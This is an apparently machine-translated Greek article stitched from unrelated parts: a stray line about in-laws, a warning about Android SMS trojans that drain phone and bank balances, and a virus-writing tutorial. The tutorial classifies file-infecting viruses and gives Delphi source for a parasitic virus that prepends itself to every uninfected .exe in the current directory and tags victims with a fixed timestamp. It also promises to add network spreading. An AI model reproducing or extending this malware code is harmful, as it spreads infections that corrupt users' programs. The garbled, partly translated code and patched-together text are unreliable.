Πώς να στείλετε έναν ιό στο θύμα. Hacking με τα χέρια κάποιου άλλου

28.03.2023
Οι σπάνιες νύφες μπορούν να καυχηθούν ότι έχουν άρτιες και φιλικές σχέσεις με την πεθερά τους. Συνήθως συμβαίνει το αντίθετο

Τα τελευταία χρόνια, είναι δυνατό να κολλήσετε έναν ιό όχι μόνο μετά από ανεπιτυχές σερφάρισμα στο διαδίκτυο - τώρα οι χάκερ και οι απατεώνες ενεργούν πολύ πιο εξελιγμένα. Σήμερα θα σας πούμε πώς να καταπολεμήσετε τους εγκληματίες του κυβερνοχώρου που στέλνουν επικίνδυνα μηνύματα με κακόβουλους συνδέσμους. Θα σας πούμε πόσο επικίνδυνο είναι να το διασχίσετε και πώς να αποφύγετε τον κίνδυνο μόλυνσης του τηλεφώνου σας.

Τι είναι αυτό το ταχυδρομείο;

Έτσι, από τα τέλη Μαΐου, τα τηλέφωνα εκατοντάδων χιλιάδων χρηστών δέχτηκαν επίθεση από απατεώνες. Τα smartphone λαμβάνουν σύντομα ενδιαφέροντα μηνύματα - "Γεια, δείτε τη φωτογραφία και τον σύνδεσμο!", στο οποίο επισυνάπτεται η διεύθυνση του ιστότοπου για τη μετάβαση. Μερικές φορές προστίθενται σημειώσεις που "Αυτό δεν είναι spam", ή "πρέπει να το καταλάβω", μπορεί να προστεθεί επώνυμοή καλέστε "Βοήθεια". Στην πραγματικότητα, εάν δεν το σκεφτείτε αμέσως, μπορείτε να κάνετε κλικ σε αυτό και να κάνετε λήψη του αρχείου. Ελπίζεις να ανοίξεις μια φωτογραφία από έναν φίλο, αλλά δεν παίρνεις τίποτα. Είναι αυτή τη στιγμή που φορτώνεται το τηλέφωνο ιογενής εφαρμογή.

Αν κοιτάξετε την επέκταση αρχείου στο αρχείο καταγραφής λήψης, θα δείτε ότι δεν υπάρχει μυρωδιά jpg εκεί, εκτελείται Πρόγραμμα APK. Το πρόγραμμα φόρτωσης ιών, ειδικά σε αυτή την περίπτωση, προκαλεί αλλαγή σε πολλές ρυθμίσεις στο τηλέφωνο.

Οι χρήστες δεν είναι πάντα σε θέση να αναγνωρίσουν έναν ιό στο κινητό τους τηλέφωνο και, κατά συνέπεια, δεν είναι δυνατό να διαγράψουν το κακόβουλο πρόγραμμα ή να προβούν σε οποιαδήποτε ενέργεια προτού ο ιός αποκτήσει πρόσβαση στα προσωπικά δεδομένα.

Αυτή τη στιγμή, τα smartphone Android θεωρούνται τα πιο ευάλωτα. Ένας νέος ιός εμφανίστηκε μέσω SMS στο Android.

Στα smartphone ανοιχτού κώδικα, που είναι στην πραγματικότητα το λειτουργικό σύστημα Android, νέοι ιοί εξαπλώνονται με απίστευτη ταχύτητα.

Τώρα έχουν αλλάξει. Προηγουμένως, προσπαθούσαν να χρησιμοποιήσουν χρήματα μόνο σε κινητά τηλέφωνα, αλλά σήμερα στοχεύουν τις τραπεζικές κάρτες και όλα τα κεφάλαια που υπάρχουν στην τράπεζα Διαδικτύου. Οι απατεώνες ενδιαφέρονται κυρίως για smartphone που υποστηρίζουν την υπηρεσία Mobile Bank. Σας επιτρέπει να κλέψετε χρήματα από τον λογαριασμό του θύματος στον αριθμό του απατεώνα. Για να γίνει αυτό, στέλνουν έναν ιό μέσω SMS στο Android.

Πώς λειτουργούν οι απατεώνες

Ο πρώτος τέτοιος ιός έγινε ενεργός στις αρχές του καλοκαιριού του 2017. Ο κίνδυνος είναι ότι το Trojan λειτουργεί εξ αποστάσεως σε smartphone Android.

Οι επιτιθέμενοι στέλνουν SMS στον επιθυμητό αριθμό, επομένως, για να εντοπίσουν την παρουσία αυτού του ιού στο κινητό τους gadget, οι κάτοχοι smartphone θα πρέπει να δώσουν προσοχή στην αύξηση του αριθμού των μηνυμάτων SMS αξίας 100 ρούβλια το καθένα. Ως αποτέλεσμα, ένα ποσό που είναι πολλαπλάσιο του 100 αποσύρεται από τον λογαριασμό κινητού του κατόχου του smartphone.

Για να κερδίσει σημαντικά χρήματα, ο εισβολέας αναγκάζεται να στείλει αρκετούς Trojans SMS από τον αριθμό του θύματός του. Άλλωστε, δεν είναι ο μόνος που εργάζεται σε αυτή τη δόλια αλυσίδα.

Ο Trojan κατοικεί στο gadget του θύματος και στέλνει μηνύματα SMS από τον αριθμό του θύματος στον "ακριβό" αριθμό των απατεώνων. Και είναι για αυτά τα μηνύματα SMS που απευθύνονται σε αυτόν τον "ακριβό" αριθμό που το θύμα χρεώνεται 100 ρούβλια το καθένα. για κάθε μη εξουσιοδοτημένο μήνυμα SMS.

Διαμεσολαβητές σε αυτό το σχήμα μπορεί να είναι ένας πάροχος τηλεπικοινωνιών, ένας πάροχος και άλλοι συνεργάτες που μπορεί να μην γνωρίζουν για τα κόλπα των απατεώνων. Για να καλύψει όλα τα έξοδα και να κερδίσει χρήματα, ο εισβολέας πρέπει να αποσύρει τουλάχιστον 1.000 ρούβλια από κάθε αριθμό.

Ταυτόχρονα, δεν μπορεί να αποκλειστεί το ενδεχόμενο οι κάτοχοι smartphone να παραπονεθούν στον χειριστή τους για κλοπή χρημάτων. Και μετά παίρνουν αντίποινα που αποτρέπουν την απάτη. Για παράδειγμα, μπορούν να εισαγάγουν την υποχρεωτική καταχώριση πρόσθετων επιβεβαιώσεων πριν από τη χρέωση χρημάτων και άλλα παρόμοια. Σε μια τέτοια κατάσταση, οι επιτιθέμενοι αναγκάζονται να αναζητήσουν νέους τρόπους απάτης.

Χάρη σε αυτούς τους παράγοντες, εμφανίστηκε ένας άλλος Trojan. Αυτός ο εκπρόσωπος του Trojan-SMS εκτελεί επίσης εντολές από έναν απομακρυσμένο διακομιστή.

Ο νέος ιός είναι πιο ευέλικτος και πλοηγείται τέλεια υπό οποιεσδήποτε συνθήκες, λαμβάνοντας ήδη υπόψη τα εμπόδια της εταιρείας κινητής τηλεφωνίας, ακόμη και την κατάσταση του λογαριασμού του συνδρομητή και την ώρα των συναλλαγών.

Πώς λειτουργεί ο ιός

Ο νέος ιός είναι αδρανής - δεν έχει ανεξαρτησία. Ακόμη και μια φορά στο smartphone, δεν εμφανίζεται με κανέναν τρόπο. Χρειάζεται μια απομακρυσμένη εντολή από τον κάτοχο του τηλεφώνου για να λειτουργήσει.

Για αυτό, χρησιμοποιείται το λεγόμενο αίτημα POST. Προορίζεται για ένα αίτημα στο οποίο ο διακομιστής Ιστού δέχεται για αποθήκευση τα δεδομένα που περικλείονται στο σώμα του μηνύματος. Χρησιμοποιείται συχνά, για παράδειγμα, για τη λήψη ενός αρχείου.

Η χρήση ενός αιτήματος POST σάς επιτρέπει να δημιουργήσετε μια σύνδεση με έναν απομακρυσμένο διακομιστή και να λάβετε την κατάλληλη εντολή, μετά τη λήψη της οποίας ο Trojan αρχίζει να στέλνει ακριβά μηνύματα SMS από τους αριθμούς των θυμάτων του στους αριθμούς των απατεώνων.

Πώς λειτουργεί το νέο Trojan; Για παράδειγμα, το πρόγραμμα στέλνει αυτόματα μηνύματα SMS με μία λέξη "BALANCE" σε έναν αριθμό που υποστηρίζει "Mobile Banking".

Έτσι, στέλνοντας ένα μήνυμα SMS από έναν σύντομο αριθμό, οι απατεώνες μπορούν να ελέγξουν εάν ο αριθμός του θύματος είναι συνδεδεμένος με έναν τραπεζικό λογαριασμό και ποια είναι η κατάσταση του λογαριασμού.

Παραδείγματα πραγματικής ζωής

Για παράδειγμα, η Sberbank έχει τον αριθμό από τον οποίο αποστέλλονται τα μηνύματα - 900. Όταν το μήνυμα "BALANCE" (ή, ενδεχομένως, στα ρωσικά "υπόλοιπο") προέρχεται από τον αποστολέα 900, τότε ο κάτοχος του τηλεφώνου, εμπιστεύεται τη Sberbank και είναι σίγουρος ότι αυτό το μήνυμα είναι από αυτήν την τράπεζα, ανοίγει το μήνυμα και απαντά σε αυτό, θέλοντας να μάθει τι συνέβη με το υπόλοιπο. Έτσι, οι απατεώνες λαμβάνουν απάντηση στα SMS τους, που για αυτούς σημαίνει ότι μια τραπεζική κάρτα είναι συνδεδεμένη στο τηλέφωνο. Επιπλέον, τους γίνεται σαφές ότι η κάρτα αυτή μπορεί να ελεγχθεί με εντολές SMS, οι οποίες περιλαμβάνονται στην υπηρεσία Mobile Banking. Και μετά, όπως λένε, «θέμα τεχνολογίας».

Ένας από τους φίλους μου έλαβε πρόσφατα μηνύματα από τον σύντομο αριθμό 4-74-1, ο οποίος είναι εγγεγραμμένος στην κινητή τράπεζα της Sberbank με το μήνυμα "Η υπηρεσία δεν είναι διαθέσιμη, δοκιμάστε ξανά αργότερα". Για ευνόητους λόγους, δεν έστειλε απάντηση, γνωρίζοντας ήδη για πιθανές απειλές. Προφανώς, πρόκειται για τους ίδιους απατεώνες, που μεταμφιέζονται σε mobile bank, που προσπαθούν να υπολογίσουν την αντίδρασή της με αυτόν τον τρόπο και να προσδιορίσουν αν έχει εγκατασταθεί mobile bank στο smartphone της.

Ταξινόμηση

HLLO- Αντικατάσταση γλώσσας υψηλού επιπέδου. Ένας τέτοιος ιός αντικαθιστά το πρόγραμμα με το σώμα του. Εκείνοι.
το πρόγραμμα καταστρέφεται και όταν ο χρήστης προσπαθεί να εκτελέσει το πρόγραμμα, ο ιός ξεκινά και «μολύνει» περαιτέρω.

HLLC - High Level Language Companion. Οι περισσότεροι από αυτούς τους ιούς χρονολογούνται από την αρχαιότητα (8-10 χρόνια πριν), όταν οι χρήστες είχαν DOS και ήταν πολύ τεμπέληδες. Αυτοί οι ιοί αναζητούν ένα αρχείο και, χωρίς να το αλλάξουν, δημιουργούν ένα αντίγραφο του εαυτού τους, αλλά με την επέκταση .COM. Εάν ένας τεμπέλης χρήστης γράψει μόνο το όνομα του αρχείου στη γραμμή εντολών, τότε το DOS είναι το πρώτο που αναζητά το αρχείο COM, εκκινώντας έναν ιό που πρώτα κάνει τη δουλειά του και μετά εκκινεί το αρχείο EXE. Υπάρχει μια άλλη τροποποίηση
HLLC - πιο σύγχρονο (7 χρόνια;)): Ο ιός μετονομάζει το αρχείο, διατηρώντας το όνομα, αλλά αλλάζοντας την επέκταση - από EXE σε, ας πούμε, OBJ ή MAP. Ο ιός αντικαθιστά το αρχικό αρχείο με το σώμα του. Εκείνοι. ο χρήστης εκτοξεύει έναν ιό, ο οποίος, έχοντας πραγματοποιήσει την πράξη αναπαραγωγής, εκκινεί το επιθυμητό πρόγραμμα - όλοι είναι ευχαριστημένοι.

HLLP - High Level Language Parasitic. Το πιο εξελιγμένο. Αποδίδουν το σώμα τους στο αρχείο μπροστά (Ο ιός ξεκινά πρώτα, μετά επαναφέρει το πρόγραμμα και το εκτελεί) ή πίσω
- τότε στην κεφαλίδα του προγράμματος γράφουμε jmp near στο σώμα του ιού, μετά από όλα, ξεκινάει πρώτα.

Μπορούμε να αφήσουμε το ίδιο το πρόγραμμα αμετάβλητο, τότε θα μοιάζει με αυτό:

Τι είναι το MZ, νομίζω ότι το μαντέψατε 🙂 Αυτά είναι τα αρχικά του αγαπημένου σας Mark Zbikowski, τα οποία όρισε σεμνά στην υπογραφή του αρχείου exe 🙂 Και τα έβαλα εδώ για να καταλάβετε
- η μόλυνση συμβαίνει σύμφωνα με την αρχή copy /b virus.exe program.exe και δεν υπάρχουν ειδικά αστεία εδώ. Οχι τώρα. Αλλά θα τα μαζέψουμε μαζί σου
- Να είναι υγιής:). Λοιπόν, για παράδειγμα: μπορείτε να κρυπτογραφήσετε τα πρώτα 512 ή περισσότερα byte του αρχικού προγράμματος με οποιονδήποτε γνωστό σας αλγόριθμο - XOR/XOR, NOT/NOT, ADD/SUB, τότε θα μοιάζει με αυτό:

Σε αυτήν την περίπτωση, η δομή του μολυσμένου αρχείου δεν θα είναι τόσο σαφής.
Δεν είναι άδικο που είμαι εδώ (στην κατάταξη, με την έννοια) τόσο σταυρωμένος
- Ο παρασιτικός αλγόριθμος χρησιμοποιείται από το 90% των σύγχρονων ιών, ανεξάρτητα από τη μέθοδο διανομής τους. Εντάξει, ας προχωρήσουμε:

ιός δικτύου. Μπορεί να είναι οποιοδήποτε από τα παραπάνω. Διαφέρει στο ότι η διανομή του δεν είναι
περιορισμένη σε έναν υπολογιστή, αυτή η μόλυνση με κάποιο τρόπο ανεβαίνει μέσω του Διαδικτύου ή ενός τοπικού δικτύου σε άλλα μηχανήματα. Νομίζω βγάζεις τακτικά 3-4 τέτοιους φίλους από τη σαπουνόκουτα
- εδώ είναι ένα παράδειγμα ιού δικτύου. Και μια φορά στον υπολογιστή κάποιου άλλου, μολύνει αρχεία με αυθαίρετο τρόπο ή δεν μολύνει ΚΑΘΟΛΟΥ.

Μακροϊοί, ιοί script, ιοί IRC. Τους έβαλα σε μια ομάδα επειδή είναι ιοί γραμμένοι σε γλώσσες ενσωματωμένες σε εφαρμογές (MSOffice :)), σενάρια (οι αγαπημένοι σας κανόνες VBS εδώ) και σενάρια IRC. Αυστηρά μιλώντας, μόλις εμφανιστεί ένα αρκετά ισχυρό (ή/και διαρροή) στοιχείο δέσμης ενεργειών σε κάποια εφαρμογή, αρχίζουν αμέσως να γράφουν ιούς σε αυτό 😉 Παρεμπιπτόντως, οι ιοί μακροεντολών είναι πολύ απλοί και ανιχνεύονται εύκολα από την ευρετική.

κωδικοποίηση

Το καταλάβαμε 🙂 Έλα, τρέξε τους delphi, σκότωσε κάθε λογής παράθυρα και σκουπίστε όλες τις ανοησίες από το παράθυρο του έργου. Δηλαδή, γενικά, σκουπίστε τα πάντα 🙂 Θα εργαστούμε μόνο με DPR που περιέχει:

πρόγραμμα EVIL_VIRUS?
ΧΡΗΣΙΜΟΠΟΙΕΙ ΠΑΡΑΘΥΡΑ, SYSUTILS;
αρχίζουν
τέλος;

Νομίζω ότι έχετε ήδη καταλάβει τη λογική του ιού από την ταξινόμηση - επαναφέρουμε και τρέχουμε το πρόγραμμα --> περιμένετε να ολοκληρώσει τη δουλειά του --> σβήστε το "εργασμένο αρχείο" (ξέχασα να πω - ΔΕΝ ΘΕΡΑΠΕΥΟΥΜΕ μολυσμένο πρόγραμμα, μεταφέρουμε τον αρχικό κώδικα στο αριστερό αρχείο και εκτελούμε ΠΑΡΑΔΕΙΓΜΑ: Μολυσμένο αρχείο NOTEPAD.EXE Δημιουργήστε το αρχείο _NOTEPAD.EXE στον ίδιο κατάλογο με τον αρχικό κώδικα και εκτελέστε τον ήδη).--> αναζητήστε ένα μη μολυσμένο αρχείο και μολύνουν. Αυτό είναι όλο 🙂 Ο βασικός σχεδιασμός του ιού μοιάζει με αυτό.

Δηλώστε τώρα για τον ισχυρό εγκέφαλό σας τις ακόλουθες μεταβλητές και σταθερές:

VaR VirBuf, ProgBuf, MyBuf: πίνακας χαρακτήρων;
SR: TSearchRec;
My,pr: Αρχείο;
ProgSize, αποτέλεσμα: ακέραιος;
PN,st: String;
si:Tstartupinfo;
p:tπληροφορίες επεξεργασίας;
μολυσμένο: boolean;
CONST VirLen: longint= 1000000;

Η πρώτη γραμμή είναι δυναμικοί πίνακες, στους οποίους θα γράψουμε το σώμα του ιού και το πρόγραμμα, αντίστοιχα. Θα γραφεί η μεταβλητή SR
χαρακτηριστικά του αρχείου που βρέθηκε-υποψήφιος για μόλυνση (ελπίζω να είστε εξοικειωμένοι με τις διαδικασίες FindFirst και FindNext, γιατί θα χειροτερέψουν;)), My and
Το Pr είναι το αρχείο από το οποίο ξεκινήσαμε και το αριστερό αρχείο με τον αρχικό κώδικα του προγράμματος (έγραψα ήδη για αυτό παραπάνω). αποτέλεσμα - το αποτέλεσμα της λειτουργίας FindFirst, πρέπει να είναι ίσο με μηδέν,
ProgSize - μέγεθος κώδικα προγράμματος. Τα υπόλοιπα είναι ξεκάθαρα από όσα ακολουθούν, εκτός
μολυσμένο - αυτό είναι ένα σημάδι μόλυνσης του αρχείου που βρέθηκε και
Το VirLen είναι το μήκος του κωδικού του ιού, θα τον αναγνωρίσετε μόνο μετά το γάμο. Ουφ, ήθελα να πω μετά τη σύνταξη. Εκείνοι. μεταγλωττίζετε, αλλάζετε την τιμή της σταθεράς στον πηγαίο κώδικα και κάνετε εκ νέου μεταγλώττιση.
Κωδικός περαιτέρω 🙂 Εδώ μπορείτε να δείτε τον κώδικα που είναι υπεύθυνος για την επαναφορά και την εκτέλεση του μολυσμένου προγράμματος:

SetLength (virbuf, VirLen);
AssignFile(my,ParamStr(0));
st:=paramstr(0);
St:= st+#0;
CopyFile (@st,"c:\windows\program.exe",false);
IF FileSize(my)> VirLen τότε
αρχίζουν
//Εκκίνηση του προγράμματος
AssignFile(my,"c:\windows\program.exe);
επαναφορά (μου);
ProgSize:= FileSize(my)-VirLen;
BlockRead(my,virbuf,virlen);
SetLength(progbuf,pRogSize);
BlockRead(my,progbuf,progSize);
CloseFile(my);
PN:= "_"+ParamStr(0);
AssignFile(pr,pn);
ReWrite(pr);
BlockWrite (pr,progbuf,progSize);
CloseFile(pr);
FillChar(Si, SizeOf(Si) , 0);
με Si do
αρχίζουν
cb:= SizeOf(Si);
dwFlags:= startf_UseShowWindow;
wShowWindow:= 4;
τέλος;
PN:= PN+#0;
Createprocess(nil,@PN,nil,nil,false,Create_default_error_mode,nil,nil,si,p);
waitforsingleobject(p.hProcess,infinite);
//Έγινε έναρξη, το πρόγραμμα ολοκληρώθηκε. Ας το σβήσουμε 🙂
ErAsE(pr);
Erase(my);

Όλα εδώ, κατ 'αρχήν, είναι απλά και ξεκάθαρα, εκτός από το γιατί μετέφερα ολόκληρο το μολυσμένο αρχείο στον κατάλογο των Windows και τι κάνουν οι γραμμές από 3 έως 5, συμπεριλαμβανομένων.
Και το έκανα επειδή η ανάγνωση από ένα αρχείο που εκτελείται είναι άβολη και είναι δυνατή μόνο χρησιμοποιώντας το CreateFile και το ReadFile WinAPI. Θα μιλήσω για την κωδικοποίηση στο WinAPI αργότερα, τώρα θα καλύψω μόνο τα βασικά
- στους Δελφούς.

Αυτές οι γραμμές είναι η μετατροπή της συμβολοσειράς σε pchar με λαϊκό τρόπο, αφού πλέον παλεύουμε για κάθε byte κώδικα. Ένα άλλο σημείο: Έκανα λάθος ορίζοντας τη διαδρομή c:\windows τόσο σκληρά. Χρησιμοποιήστε καλύτερα τη διαδικασία GetWindowsDirectory, μάθετε σίγουρα 🙂 Όλα τα άλλα είναι ξεκάθαρα χωρίς σχόλια (αν όχι
σταματήστε να παραλείπετε την πληροφορική;)), ας προχωρήσουμε:

αποτέλεσμα:= FindFirst("*.exe",faAnyFile,sr);
WHILE Αποτέλεσμα= 0 DO
αρχίζουν
// Έλεγχος για ψείρες
infected:= false;
IF DateTimeToStr (FileDateToDateTime (fileage (sr.name)))= "08/03/98 06:00:00" τότε infected:= true;
//Τετραγωνισμένος!
IF (infected= false)και (sr.name<>paramstr(0)) τότε
αρχίζουν
AssignFile(my,sr.Name);
ReWrite(my);
BlockWrite(my,virbuf,virlen);
BlockWrite(my,progbuf,sr.Size);
CloseFile(my);
FileSetDate (sr.Name,DateTimeToFileDate(StrToDateTime("08/03/98 06:00:00")));
τέλος;
τέλος;

//Εάν ο ιός λειτουργεί "καθαρός", π.χ. όχι από ένα μολυσμένο πρόγραμμα, μετά βγείτε
τέλος άλλο σταμάτημα?

Τι βλέπει εδώ το οξυδερκές μάτι σου; Σωστά, η διαδικασία FindFirst αναζητά ένα δεδομένο θύμα (οποιοδήποτε αρχείο exe από τον τρέχοντα κατάλογο), μεταφέρει τα χαρακτηριστικά του στη μεταβλητή SR. Στη συνέχεια, πρέπει να το ελέγξετε για μόλυνση. Αυτό γίνεται με έναν πρωτότυπο τρόπο: όταν έχει μολυνθεί, ένα αρχείο εκχωρείται ως def. ημερομηνία και ώρα. Και κάθε αρχείο με τέτοια χαρακτηριστικά θεωρείται μολυσμένο. Όλα τα άλλα είναι και πάλι άσεμνα απλά, οπότε προχωρώ ομαλά στο συμπέρασμα 🙂

συμπέρασμα

Έτσι έχουμε κωδικοποιήσει τον πρώτο μας ιό. Μέχρι στιγμής, μπορεί να μολύνει μόνο αρχεία στον τρέχοντα κατάλογο (αν και είμαι σίγουρος ότι μπορείτε εύκολα να τον αναβαθμίσετε;)) και δεν γνωρίζει τίποτα για άλλους καταλόγους και το Διαδίκτυο. Μην απελπίζεστε, θα τον βάλουμε σε λειτουργία σύντομα. Προς το παρόν, παίξτε με αυτές τις γραμμές και περιμένετε το επόμενο άρθρο.

Εφαρμογή

Θα τολμήσω να σας δώσω μια περιγραφή όλων των διαδικασιών που χρησιμοποιούνται στο άρθρο. Αυτό θα σας βοηθήσει να τα αναζητήσετε στη βοήθεια και να ετοιμαστείτε για την κωδικοποίηση σοβαρών ιών χρησιμοποιώντας
WinAPI.

Το AssignFile - δεν υπάρχει ανάλογο στο WinAPI - αντιστοιχίζει ένα αρχείο
με μια μεταβλητή τύπου File ή TextFile

Επαναφορά - τα ανάλογα των _lopen και CreateFile - ανοίγει
υπάρχον αρχείο και ορίστε τη θέση
ανάγνωση κορυφή

ReWrite - _lcreate and CreateFile - δημιουργεί ένα νέο αρχείο και
στόμα θέση ανάγνωσης στην αρχή. Αν τρέφονται
Ξαναγράψτε ένα υπάρχον αρχείο, τα περιεχόμενά του
θα γίνει επαναφορά

BlockRead - _lread και ReadFile - διαβάζει στο buffer
ορισμένη ποσότητα δεδομένων από ένα αρχείο

BlockWrite - _lwrite και WriteFile - αντίστοιχα, γράφει
δεδομένα σε αρχείο

SeekFile - _llseek και SetFilePointer - μετακίνηση θέσης
ανάγνωση/εγγραφή σε ανοιχτό αρχείο

CloseFile - _lclose και CloseHandle - κλείνει ένα άνοιγμα
αρχείο

Διαγραφή - Διαγραφή αρχείου - διαγραφή αρχείου

FindFirst - FindFirstFile - αναζήτηση για ένα αρχείο με κριτήρια

FindNext - FindNextFile - αναζήτηση για το επόμενο αρχείο

Το πιο πρόσφατο περιεχόμενο του ιστότοπου